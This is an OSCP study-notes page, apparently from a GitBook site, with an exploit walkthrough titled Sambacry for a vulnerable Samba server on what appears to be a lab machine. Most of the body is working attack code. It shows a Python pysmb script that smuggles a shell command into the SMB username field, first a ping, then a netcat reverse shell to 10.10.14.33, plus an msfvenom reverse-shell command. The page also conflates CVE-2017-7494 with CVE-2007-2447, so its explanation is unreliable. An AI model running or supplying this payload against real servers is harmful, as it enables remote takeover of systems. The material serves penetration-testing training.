✏️
OSCP
  • $WhoAmI?
  • Manual
  • NMAP
    • NSE Scripts
  • Steganography
  • Services Enumeration
    • Postgres Psql
    • SNMTP - 199
    • SSH - 22
    • TELNET - 23
    • RDP - 3389
    • DISTCCD - 3632
    • IMAP - 143
    • TFTP - UDP69
    • FTP - 21
    • HTTP 80/443
      • LFI to RCE
      • ShellShock
      • GIT
      • XXE, SQLI, CRLF, CSV,
      • CMS
      • Locations
        • Interested Linux Files
        • Logs
      • Command Injection
      • Remote File Inclusion (RFI)
      • File Upload Vulnerabilities
      • Remote Code Execution (RCE)
      • SQL Injection
      • Local File Inclusion (LFI)
        • LFI TO RCE
      • Web Enumeration
        • Patator BruteForce
        • ShellShock
        • Nikto
        • Anonymous Scanning
        • Fuzzers
        • DNS
    • SMB 139/445
      • SMB Exploit
      • SMB Enumerate
      • Send and Execute
      • Samba 2.2.x
    • RPC - 111
    • NFS
    • SNMP 161
    • SMTP 25
    • VNC - 5800
    • MYSQL - 3306
    • POP3 - 110
    • LDAP - 389
    • IRC 667
    • Java-RMI 1098/1099/1050
    • 1433 - MSSQL
  • Linux
    • Shells Linux
    • File Transfer
    • Linux Priv Esc
    • Fix Shell
    • Upload
    • Restricted Shell
  • Windows
    • File Transfer
    • Reverse Shell Cheatsheet
      • Full TTYs
      • Shells - Windows
      • MSFVENOM
    • Post Explotation
      • Nishang
      • Kernel Exploits
      • Service Exploits
      • Unquoted service paths
      • Mimikatz
    • BackDoors
    • EternalBlue MS17-010
    • Windows - Download and execute methods
    • Windows Priv Exc
    • Priv Esc Tools
    • ByPass UAC
      • Bypassing default UAC settings manually c++
      • EventVwr Bypass UAC Powershell
      • ByPass UAC Metasploit
      • Bypassing UAC with Kali’s bypassuac
      • Bypass UAC on Windows Vista
  • Password Attack
    • Intercepting Login Request
    • Windows Hashes
    • Linux Hashes
    • Wordlists
    • Brute Force Password Attacks & Cracking
    • Hashes
  • Network Pivoting Techniques
  • Buffer OverFlow
    • 6. Getting Shell
    • 5. Finding Bad Characters
    • 4. Overwrite EIP
    • 3. Finding The Offset
    • 2. Fuzzing
    • 1. Spiking
  • Downloads
  • Online Websites
  • Privilege Escalation History
  • Exploit
    • Unreal IRC
    • Sambacry
    • Shellshock
    • Padding Oracle Attack
Powered by GitBook
On this page

Was this helpful?

  1. Exploit

Sambacry

PreviousUnreal IRCNextShellshock

Last updated 3 years ago

Was this helpful?

Samba smbd 3.X-4.X

Samba in 4.5.9 version and before that is vulnerable to a remote code execution vulnerability named SambaCry. CVE-2017-7494 allows remote authenticated users to upload a shared library to a writable shared folder, and perform code execution attacks to take control of servers that host vulnerable Samba services. CVE-2007-2447 Script

Let’s write the script in Python3. We need to get pysmb library to authenticate with smb. The exploit script does not need anything more than a RPC Connect Request.

Write a simple POC: 

#!/usr/bin/env python3 
from smb.SMBConnection import SMBConnection 
SMBConnection( 
 "/=`nohup ping -c 3 10.10.14.33`",  
    "",  
    "",  
    "", 
).connect("10.10.10.3", 139)

Listen on tun0 with tcpdump and execute script.

smb-enum

We get a ping reply which confirms Arbitrary Code Execution. Replace payload with reverse shell. Generate Shellcode for payload with msfvenom. 

msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.33 LPORT=2222 EXITFUNC=thread

Now replace the ping command in Python script with netcat reverse shell payload 

from smb.SMBConnection import SMBConnection 
SMBConnection( 
    "/=`nohup mkfifo /tmp/lmzf; nc 10.10.14.33 2222 0</tmp/lmzf | /bin/sh >/tmp/lmzf 2>&1; rm /tmp/lmzf`", 
    "", 
    "", 
    "", 
).connect("10.10.10.3", 139)

Open netcat listener on port 2222 and execute script.

And finally we have the Root Shell!! Lame! :)

payload-with-msfvenom